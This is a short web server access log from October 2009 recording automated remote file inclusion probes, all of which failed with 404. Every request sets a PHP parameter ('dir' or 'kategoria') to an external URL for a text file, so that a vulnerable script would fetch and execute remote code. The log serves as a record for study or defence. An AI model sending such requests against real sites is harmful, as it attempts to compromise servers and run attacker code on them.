222.236.47.182 - - [28/Oct/2009:07:20:14 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.236.47.182 - - [28/Oct/2009:07:20:14 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/login.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.143.43.208 - - [28/Oct/2009:07:20:54 -0400] "GET //galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
221.143.43.208 - - [28/Oct/2009:07:20:54 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
221.143.43.208 - - [28/Oct/2009:07:20:54 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
221.143.43.208 - - [28/Oct/2009:07:21:01 -0400] "GET //galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
221.143.43.208 - - [28/Oct/2009:07:21:01 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
